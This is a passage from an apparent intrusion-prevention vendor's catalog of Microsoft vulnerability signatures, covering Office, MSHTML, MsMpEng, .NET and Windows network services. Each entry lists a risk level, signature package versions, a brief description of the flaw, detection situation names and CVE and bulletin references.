Description: A remote code execution vulnerability has been reported in the Microsoft MSHTML Platform. The vulnerability is due to improper handling of objects in memory. A remote attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page or document. Successful exploitation could lead arbitrary code execution.
Situation: File-Text_Microsoft-MSHTML-Platform-CVE-2021-33742-Remote-Code-Execution
References:
CVE-2021-33742
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33742
ms21-jun
http://technet.microsoft.com/security/bulletin/ms21-jun
Back to top

Microsoft-MsMpEng-RCE-CVE-2017-0290

About this vulnerability: A vulnerability in Microsoft Malware Protection service
Risk: Moderate
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MsMpEng
Type: Malfunction
Description: There exists a remote code execution vulnerability in the MsMpEng Malware Protection service that is enabled by default on multiple Windows instances such as Windows 8, 8.1, 10, Windows Server 2012. A remote attacker can trigger the vulnerability in multiple ways, for example by e-mail or luring the victim to visit a malicious URL.
Situation: File-Text_Microsoft-MsMpEng-RCE-CVE-2017-0290
References:
CVE-2017-0290
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0290
Back to top

Microsoft-MsMpEng-Remote-Code-Execution-Vulnerability-CVE-2018-0986

About this vulnerability: A vulnerability in Microsoft Malware Protection Engine
Risk: High
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1731-5242
Platform: Windows
Software: MsMpEng
Type: Input Validation
Description: There exists a remote code execution vulnerability in Microsoft Malware Protection Engine. Scanning a specially crafted file causes a memory corruption in the engine.
Situation: File-Binary_Microsoft-Malware-Protection-Engine-Rar-Vmsf_RGB-Memory-Corruption
References:
CVE-2018-0986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0986
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Microsoft-Multiple-Products-HTML-Sanitization-Cross-Site-Scripting

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0; Internet Explorer 9.0
Type: Input Validation
Description: There exists a cross-site scripting vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Multiple-Products-HTML-Sanitization-Cross-Site-Scripting
References:
CVE-2012-1858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1858
OSVDB-82861
http://www.osvdb.org/82861
MS12-039
http://technet.microsoft.com/security/bulletin/MS12-039
Back to top

Microsoft-Multiple-Products-TrueType-Font-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Silverlight
Risk: Moderate
First detected in: sgpkg-ips-1036-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a memory corruption vulnerability in the Microsoft Windows Kernel. A remote attacker can use a malicious font file to exploit this, resulting in remote code execution in the Windows kernel.
Situation: File-Binary_Microsoft-Multiple-Products-TrueType-Font-Parsing-Memory-Corruption
References:
CVE-2011-3402
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3402
BID-50462
http://www.securityfocus.com/bid/50462
OSVDB-76843
http://www.osvdb.org/76843
MS11-087
http://technet.microsoft.com/security/bulletin/MS11-087
Back to top

Microsoft-Negotiate-SSP-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A NULL pointer deference and a buffer overflow vulnerability exists in the Negotiate Security Support Provider (SSP) interface. The Negotiate SSP interface does not properly validate a value that is used during the authentication protocol selection. An attacker who successfully exploits this vulnerability can cause a Denial of Service, or remotely execute code. Triggering the NULL-pointer deference vulnerability leads to a memory access violation error and will cause the current thread in LSASRV.DLL to terminate. However, this exception will be captured and handled. The advisory claimed that this vulnerability would lead to the denial-of-service due to service termination, and eventual system shutdown; Assurent has not observed this behaviour in the lab. It has been claimed that triggering the buffer overrun vulnerability will lead to a denial-of-service attack in most cases due to the termination of LSASS.EXE. Both Windows 2000 and Windows XP will detect the unexpected termination of LSASS.EXE and restart the system. However, exploiting Windows Server 2003 will result in kernel failure or &quot;blue-screen&quot;. In addition, an attacker may also be able to execute arbitrary code on the target, in which case the behaviour would vary on the nature of the injected code.
Situation: HTTP_CSH-Microsoft-Negotiate-SSP-Buffer-Overflow
References:
CVE-2004-0119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0119
BID-10113
http://www.securityfocus.com/bid/10113
MS04-011
http://technet.microsoft.com/security/bulletin/MS04-011
Back to top

Microsoft-Net-Framework-Mscoreei.dll-Insecure-Library-Loading

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: Moderate
First detected in: sgpkg-ips-754-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Malfunction
Description: The .NET framework has a vulnerability resulting from insecurely loading a dynamic library from a network share. Successful exploitation can allow the attacker to run code on the target host.
Situation: HTTP_CRL-Microsoft-Net-Framework-Mscoreei.dll-Insecure-Library-Loading
SMB-TCP_Microsoft-Net-Framework-Mscoreei.dll-Insecure-Library-Loading
References:
CVE-2016-0148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0148
MS16-041
http://technet.microsoft.com/security/bulletin/MS16-041
Back to top

Microsoft-Net-Framework-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: Moderate
First detected in: sgpkg-ips-988-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Input Validation
Description: Improper parsing of WSDL files causes a code execution vulnerability in MS .Net. A successful attack allows arbitrary code to be execute on the target system with the privileges of the target process.
Situation: File-Text_Microsoft-Net-Framework-Remote-Code-Execution
References:
CVE-2017-8759
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8759
Back to top

Microsoft-Net-Framework-Sharepoint-And-Visual-Studio-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: Moderate
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Improper handling of XML causes a remote code execution vulnerability in the Microsoft .NET Framework, SharePoint, and Visual Studio. A successful exploit allows an attacker to execute arbitrary code with the privileges of the target application.
Situation: File-Text_Microsoft-Net-Framework-Sharepoint-And-Visual-Studio-Remote-Code-Execution
References:
CVE-2020-1147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1147
Back to top

Microsoft-Netlogon-RPC-Null-Deference-Denial-Of-Service-CVE-2010-2742

About this vulnerability: A vulnerability in Microsoft Netlogon RPC service
Risk: Moderate
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Netlogon service.
Situation: MSRPC-TCP_CPS-Microsoft-Netlogon-RPC-Null-Deference-Denial-Of-Service
References:
CVE-2010-2742
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2742
MS10-101
http://technet.microsoft.com/security/bulletin/MS10-101
Back to top

Microsoft-Network-Policy-Server-Radius-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: Moderate
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A denial of service vulnerability has been reported in Microsoft Network Policy Server. The vulnerability is due to an error in processing certain specially crafted username strings. A remote, unauthenticated attacker could exploit this vulnerability by sending specially crafted requests to the Network Policy Server. Successful exploitation could lead to a denial of service condition on the server.
Situation: Generic_UDP-Microsoft-Network-Policy-Server-Radius-Denial-Of-Service
References:
CVE-2015-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0015
BID-71933
http://www.securityfocus.com/bid/71933
MS15-007
http://technet.microsoft.com/security/bulletin/MS15-007
Back to top

Microsoft-Network-Policy-Server-Radius-Denial-Of-Service-CVE-2016-0050

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-733-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A denial of service condition can be caused by an atttacker through the exploitation of a RADIUS user name parsing vulnerability in Windows.
Situation: Generic_UDP-Microsoft-Network-Policy-Server-Radius-Denial-Of-Service-CVE-2016-0050
References:
CVE-2016-0050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0050
MS16-021
http://technet.microsoft.com/security/bulletin/MS16-021
Back to top

Microsoft-Ntlm-Authentication-After-HTTP-Redirect

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-641-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7
Software: Generic HTTP client
Type: Malfunction
Description: There is a vulnearbility in Microsoft Windows. When an appication receives HTTP redirect request to a file:// URI that points to a remote location, it attempts to use NTLM authentication to gain access. This might expose the current user credentials to an arbitrary server.
Situation: HTTP_SHS-Redirect-To-File-URI
Back to top

Microsoft-Object-Packager-Insecure-Executable-Launching-Vulnerability

About this vulnerability: Detected an attempt to exploit a vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-433-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: Detected an attempt to exploit a vulnerability in Microsoft Windows
Situation: HTTP_CSU-Microsoft-Object-Packager-Insecure-Executable-Launching-Vulnerability
SMB-TCP_Microsoft-Object-Packager-Insecure-Executable-Launching-Vulnerability
References:
CVE-2012-0009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0009
BID-51297
http://www.securityfocus.com/bid/51297
MS12-002
http://technet.microsoft.com/security/bulletin/MS12-002
Back to top

Microsoft-OData-Protocol-Replace-Denial-Of-Service-Vulnerability

About this vulnerability: A vulnerability in Microsoft OData Protocol
Risk: Moderate
First detected in: sgpkg-ips-502-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Open Data (OData) Protocol.
Situation: HTTP_CRL-Microsoft-OData-Protocol-Replace-Denial-Of-Service-Vulnerability
References:
CVE-2013-0005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0005
BID-57141
http://www.securityfocus.com/bid/57141
OSVDB-88968
http://www.osvdb.org/88968
MS13-007
http://technet.microsoft.com/security/bulletin/MS13-007
Back to top

Microsoft-Office-Access-ActiveX-Control-Memory-Corruption-CVE-2010-0814

About this vulnerability: A memory corruption vulnerability in Microsoft Office Access ActiveX Control
Risk: High
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Office Access ActiveX Control. By enticing a target user to visit a malicious web page, an attacker can execute arbitrary code with the privileges of the logged in user.
Situation: HTTP_SS-Microsoft-Office-Access-ActiveX-Control-Memory-Corruption-CVE-2010-0814
File-Text_Microsoft-Office-Access-ActiveX-Memory-Corruption-CVE-2010-0814
References:
CVE-2010-0814
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0814
MS10-044
http://technet.microsoft.com/security/bulletin/MS10-044
Back to top

Microsoft-Office-Art-Drawing-Records-CVE-2010-3334

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office XP; Microsoft Office 2003; Microsoft Office 2007; Microsoft Office 2010; Microsoft Office 2004; Microsoft Office 2008
Type: Input Validation
Description: There is a vulnerability in Microsoft Office.
Situation: HTTP_SS-Microsoft-Office-Art-Drawing-Records-CVE-2010-3334
File-OLE_Microsoft-Office-Art-Drawing-Records-CVE-2010-3334
References:
CVE-2010-3334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3334
BID-44656
http://www.securityfocus.com/bid/44656
MS10-087
http://technet.microsoft.com/security/bulletin/MS10-087
Back to top

Microsoft-Office-Art-Property-Table-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-389-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Microsoft Office. The vulnerability is due to insufficient input validation when processing Art Property tables. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious Office document. Success exploitation could result in injection and execution of arbitrary code, any code injected and executed will be under the security context of the current logged on user. The behaviour of the target would depend on the intention of the malicious code. In case of unsuccessful code injection, the affected application could terminate abnormally.
Situation: File-OLE_Microsoft-Office-Art-Property-Table-Memory-Corruption
References:
CVE-2009-2528
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2528
BID-36650
http://www.securityfocus.com/bid/36650
MS09-062
http://technet.microsoft.com/security/bulletin/MS09-062
Back to top

Microsoft-Office-ASLR-Bypass-CVE-2015-2375

About this vulnerability: A remote code execution vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Office
Situation: File-TextId_Microsoft-Office-ASLR-Bypass-CVE-2015-2375
References:
CVE-2015-2375
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2375
MS15-070
http://technet.microsoft.com/security/bulletin/MS15-070
Back to top

Microsoft-Office-Bad-Index-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: A memory-corruption vulnerability exists in Microsoft Office. The vulnerability is due to improper handling of objects when parsing a specially crafted Office document. A remote, unauthenticated attacker can exploit this vulnerability by enticing a target user to open a specially crafted Office file. Successful exploitation allows the attacker to execute arbitrary code in the context of the current user.
Situation: File-OLE_Microsoft-Office-Bad-Index-Memory-Corruption
References:
CVE-2014-6334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6334
BID-70962
http://www.securityfocus.com/bid/70962
OSVDB-114527
http://www.osvdb.org/114527
MS14-069
http://technet.microsoft.com/security/bulletin/MS14-069
Back to top

Microsoft-Office-Buffer-Overflow-CVE-2013-1331

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office 2003; Microsoft Office 2011
Type: Input Validation
Description: There is a vulnerability in Microsoft Office.
Situation: File-OLE_Microsoft-Office-Buffer-Overflow-CVE-2013-1331
File-PNG_Microsoft-Multiple-Products-Buffer-Overflow
References:
CVE-2013-1331
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1331
OSVDB-94127
http://www.osvdb.org/94127
MS13-051
http://technet.microsoft.com/security/bulletin/MS13-051
Back to top

Microsoft-Office-Cgm-Image-Converter-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Office
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Microsoft Office. The vulnerability is due to the way Office allocates a buffer size when handling CGM image files. An attacker can leverage this vulnerability by enticing a target user to open a malicious file. Successful exploitation would allow an attacker to execute arbitrary code in the security context of the logged in user. An unsuccessful attack could cause an abnormal termination of the affected product.
Situation: File-Binary_Microsoft-Office-Cgm-Image-Converter-Buffer-Overflow
References:
CVE-2010-3945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3945
MS10-105
http://technet.microsoft.com/security/bulletin/MS10-105
Back to top

Microsoft-Office-Ctasksymbol-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: There exists a Use-After-Free vulnerability in Microsoft Office. A remote attacker can use this to execute arbitrary code in the context of the current user.
Situation: File-OLE_Microsoft-Office-Ctasksymbol-Use-After-Free
File-TextId_Microsoft-Office-Ctasksymbol-Use-After-Free
References:
CVE-2015-1642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1642
MS15-081
http://technet.microsoft.com/security/bulletin/MS15-081
Back to top

Microsoft-Office-CVE-2015-1649

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-638-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office 2007; Microsoft Office 2010; Microsoft Office 2011; Microsoft Office 2013; Microsoft Office 2013 RT; Microsoft Office Web Apps 2010; Microsoft Office Web Apps 2013; Microsoft Sharepoint Server 2010; Microsoft Sharepoint Server 2013
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Office. The vulnerability is due to improper handling of embedded objects when parsing a specially crafted Office document. A remote attacker could exploit this vulnerability by enticing a user to open a crafted Office file. Successful exploitation could result in arbitrary code execution with the privileges of the currently logged on user.
Situation: File-TextId_Microsoft-Office-CVE-2015-1649
References:
CVE-2015-1649
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1649
MS15-033
http://technet.microsoft.com/security/bulletin/MS15-033
Back to top

Microsoft-Office-CVE-2015-1650

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-638-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: A remote code execution vulnerability has been reported in Microsoft Office. The vulnerability is due to improper manipulation of objects in memory while parsing specially crafted Word files. A remote attacker can exploit this vulnerability by enticing a user open a maliciously crafted Word file. Successful exploitation could result in code execution in the context of the affected user.
Situation: File-TextId_Microsoft-Office-CVE-2015-1650
References:
CVE-2015-1650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1650
MS15-033
http://technet.microsoft.com/security/bulletin/MS15-033
Back to top

Microsoft-Office-CVE-2015-1682-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-646-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Office 2010; Microsoft Excel 2010; Microsoft PowerPoint 2010; Microsoft Office 2013; Microsoft Excel 2013; Microsoft PowerPoint 2013
Type: Malfunction
Description: A remote code execution vulnerability exists in Microsoft Office.
Situation: File-TextId_Microsoft-Office-CVE-2015-1682-Remote-Code-Execution
References:
CVE-2015-1682
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1682
MS15-046
http://technet.microsoft.com/security/bulletin/MS15-046
Back to top

Microsoft-Office-CVE-2016-0021

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-742-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Office.
Situation: File-RTF_Microsoft-Office-CVE-2016-0021
References:
CVE-2016-0063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0063
MS16-029
http://technet.microsoft.com/security/bulletin/MS16-029
Back to top

Microsoft-Office-CVE-2016-3234-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office; Microsoft Office Compatibility Pack; Microsoft Word
Type: Malfunction
Description: A vulnerability in multiple Microsoft Office applications which allows remote attacker to obtain sensitive information from process memory via a crafted Office document.
Situation: File-RTF_Microsoft-Office-CVE-2016-3234-Information-Disclosure
References:
CVE-2016-3234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3234
MS16-070
http://technet.microsoft.com/security/bulletin/MS16-070
Back to top

Microsoft-Office-CVE-2016-3284-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-780-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Office
Type: Malfunction
Description: A memory corruption vulnerability in Microsoft Office.
Situation: File-TextId_Microsoft-Office-CVE-2016-3284-Memory-Corruption
References:
CVE-2016-3284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3284
MS16-088
http://technet.microsoft.com/security/bulletin/MS16-088
Back to top

Microsoft-Office-CVE-2016-3317

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-785-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Office detected
Situation: File-RTF_Microsoft-Office-CVE-2016-3317
References:
CVE-2016-3317
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3317
MS16-099
http://technet.microsoft.com/security/bulletin/MS16-099
Back to top

Microsoft-Office-CVE-2016-3318-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: There exists an out-of-bounds write vulnerability in Microsoft Office products. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_Microsoft-Office-CVE-2016-3318-Remote-Code-Execution
File-RTF_Microsoft-Office-CVE-2016-3318-Remote-Code-Execution
References:
CVE-2016-3318
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3318
MS16-099
http://technet.microsoft.com/security/bulletin/MS16-099
Back to top

Microsoft-Office-CVE-2016-7264-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-839-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: A vulnerability in Microsoft Excel
Situation: File-OLE_Microsoft-Office-CVE-2016-7264-Out-Of-Bounds-Read
References:
CVE-2016-7264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7264
MS16-148
http://technet.microsoft.com/security/bulletin/MS16-148
Back to top

Microsoft-Office-CVE-2016-7289-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Publisher
Risk: High
First detected in: sgpkg-ips-844-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Publisher; Microsoft Office
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Office. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-OLE_Microsoft-Office-CVE-2016-7289-Memory-Corruption
References:
CVE-2016-7289
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7289
MS16-148
http://technet.microsoft.com/security/bulletin/MS16-148
Back to top

Microsoft-Office-CVE-2017-0014

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Office
Situation: File-Binary_Microsoft-Office-CVE-2017-0014
References:
CVE-2017-0014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0014
MS17-007
http://technet.microsoft.com/security/bulletin/MS17-007
Back to top

Microsoft-Office-CVE-2019-0560-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: There has been reported an information disclosure vulnerability in Microsoft Office. This vulnerability can be exploited by opening a maliciously crafted Office document.
Situation: File-TextId_Microsoft-Office-CVE-2019-0560-Information-Disclosure
References:
CVE-2019-0560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0560
Back to top

Microsoft-Office-Drawing-Exception-Handling-CVE-2010-3335

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office XP; Microsoft Office 2003; Microsoft Office 2007; Microsoft Office 2010; Microsoft Office 2004; Microsoft Office 2008
Type: Input Validation
Description: There is a vulnerability in Microsoft Office.
Situation: HTTP_SS-Microsoft-Office-Drawing-Exception-Handling-CVE-2010-3335
File-OLE_Microsoft-Office-Drawing-Exception-Handling-CVE-2010-3335
References:
CVE-2010-3335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3335
BID-44659
http://www.securityfocus.com/bid/44659
MS10-087
http://technet.microsoft.com/security/bulletin/MS10-087
Back to top

Microsoft-Office-Drawing-Record-Msofbtopt-Code-Execution

About this vulnerability: Code execution vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-102-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Office; Microsoft Project; Microsoft Visio
Type: Input Validation
Description: There is a vulnerability in Microsoft Office products. The flaw is due to improper handling of Microsoft Office files containing malformed records. An attacker can exploit this vulnerability by enticing an unsuspecting user to open a malicious Office document. This flaw may allow the attacker to execute arbitrary code in the context of the currently logged-in user.
Situation: HTTP_Microsoft-Office-Drawing-Record-Msofbtopt-Code-Execution
File-OLE_Microsoft-Office-Drawing-Record-Msofbtopt-Code-Execution
References:
CVE-2007-0671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0671
BID-22383
http://www.securityfocus.com/bid/22383
OSVDB-31901
http://www.osvdb.org/31901
MS07-015
http://technet.microsoft.com/security/bulletin/MS07-015
Back to top

Microsoft-Office-Drawing-Shapes-Handling-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: There exists a code execution vulnerability in Microsoft Office. The vulnerability is due to improper parsing of the Shapes in the Office document. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Office file, potentially causing arbitrary code to be injected and executed in the security context of the current user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, the office application used to open the document will terminate, resulting in the loss of any unsaved data from the current session.
Situation: File-OLE_Microsoft-Office-Drawing-Shapes-Handling-Memory-Corruption
References:
CVE-2008-0118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0118
BID-28146
http://www.securityfocus.com/bid/28146
MS08-016
http://technet.microsoft.com/security/bulletin/MS08-016
Back to top

Microsoft-Office-Eps-CVE-2017-0262-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: Incorrect handling of encapsulated PostScript documents within Office files causes a type confusion vulnerability in Microsoft Office. A successful exploit allows an attacker to run arbitrary code with the privileges of the affected application.
Situation: File-TextId_Microsoft-Office-Eps-CVE-2017-0262-Type-Confusion
References:
CVE-2017-0262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0262
Back to top

Microsoft-Office-Eqnedt32-CVE-2018-0802-Matrix-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Buffer Overflow
Description: There has been reported a stack buffer overflow vulnerability in Microsoft Office. Embedded Equation Editor OLE objects in Office documents are handled incorrectly. A remote attacker could exploit this vulnerability by enticing a user to open a specially crafted file, which could lead to code execution.
Situation: File-RTF_Microsoft-Office-Eqnedt32-CVE-2018-0802-Matrix-Stack-Buffer-Overflow
References:
CVE-2018-0802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0802
Back to top

Microsoft-Office-Eqnedt32-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-1017-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Buffer Overflow
Description: Incorrect handling of equations in OLE files in Microsoft Office.
Situation: File-RTF_Microsoft-Office-Eqnedt32-Stack-Buffer-Overflow
References:
CVE-2017-11882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
Back to top

Microsoft-Office-Equation-Editor-Memory-Corruption

About this vulnerability: A Microsoft Office Equation Editor Memory Corruption vulnerability
Risk: Moderate
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: A vulnerability in Microsoft Office Equation Editor wihch allows remote attackers to run arbitrary code in the context of the current user by failing to properly handle OLE objects in memory.
Situation: File-Text_Microsoft-Office-Equation-Editor-Memory-Corruption
References:
CVE-2017-11882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
Back to top

Microsoft-Office-Excel-ADO-Object-Parsing-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Office
Type: Malfunction
